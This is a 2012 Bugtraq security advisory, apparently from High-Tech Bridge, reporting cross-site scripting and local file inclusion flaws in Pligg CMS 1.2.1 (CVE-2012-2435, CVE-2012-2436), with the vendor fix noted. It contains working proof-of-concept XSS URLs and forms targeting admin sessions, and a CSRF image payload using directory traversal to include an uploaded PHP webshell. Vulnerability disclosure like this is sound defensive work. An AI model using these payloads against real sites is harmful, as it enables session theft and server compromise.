lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 23 May 2012 12:07:42 +0200 (CEST)
From: advisory@...ridge.com
To: bugtraq@...urityfocus.com
Subject: Multiple vulnerabilities in Pligg CMS 

Advisory ID: HTB23089
Product: Pligg CMS 
Vendor: Pligg, LLC.
Vulnerable Version(s): 1.2.1 and probably prior
Tested Version: 1.2.1
Vendor Notification: 25 April 2012 
Vendor Patch: 18 May 2012 
Public Disclosure: 23 May 2012 
Vulnerability Type: Local File Inclusion, Cross-Site Scripting (XSS) 
CVE References: CVE-2012-2435, CVE-2012-2436
Solution Status: Fixed by Vendor
Risk Level: Medium 
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Pligg CMS , which can be exploited to perform Cross-Site Scripting (XSS) and Local File Inclusion attacks.


1) Multiple Cross-Site Scripting (XSS) in Pligg CMS: CVE-2012-2436

1.1 Input passed via the arbitrary (any) GET parameter to /admin/admin_index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/admin/admin_index.php?action=move&any_get_parameter_name_here=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admin/admin_index.php?action=minimize&any_get_parameter_name_here=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.2 Input passed via the "karma_username" POST parameter to module.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:


<form action="http://[host]/module.php?module=karma" method="post" name="main" id="main">
<input type="hidden" name="karma_value" value="1">
<input type="hidden" name="karma_username" value="<script>alert(document.cookie);</script>">
<input type="submit" name="submit" id="btn" value="submit"> 
</form>


1.3 Input passed via the "q_1_low". "q_1_high", "q_2_low", "q_2_high" GET parameters to module.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/module.php?module=captcha&action=configure&captcha=math&q_1_low=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/module.php?module=captcha&action=configure&captcha=math&q_1_high=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/module.php?module=captcha&action=configure&captcha=math&q_2_low=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/module.php?module=captcha&action=configure&captcha=math&q_2_high=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.4 Input passed via the "edit" GET parameter to module.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/module.php?module=admin_language&mode=edit&edit=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E


2) Local File Inclusion in Pligg CMS: CVE-2012-2435

2.1 Input passed via the "captcha" GET parameter to module.php is not properly verified before being used in include_once() function and can be exploited to include arbitrary or previously uploaded local files. This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes, however successful exploitation of this vulnerability requires administrative privileges. Therefore the most appropriate vector of exploitation is CSRF. 

The attacker should register in the system, upload a ".jpg" avatar with malicious content (e.g. PHP webshell upload) and make logged-in administrator visiting specially crafted web page that will exploit Local File Inclusion via CSRF. For example this PoC (Proof of Concept):

<img src="http://[host]/module.php?module=captcha&action=configure&captcha=../../../avatars/user_uploaded/[USER_ID]_original.jpg%00">

Successful exploitation of this vulnerability requires that "magic_quotes_gpc" is off.

-----------------------------------------------------------------------------------------------

Solution:

Upgrade to Pligg CMS 1.2.2

More Information: http://forums.pligg.com/downloads.php?do=file&id=15

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple vulnerabilities in Pligg CMS.
[2] Pligg CMS - http://pligg.com - Pligg is an open source CMS (Content Management System) that you can download and use for free.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ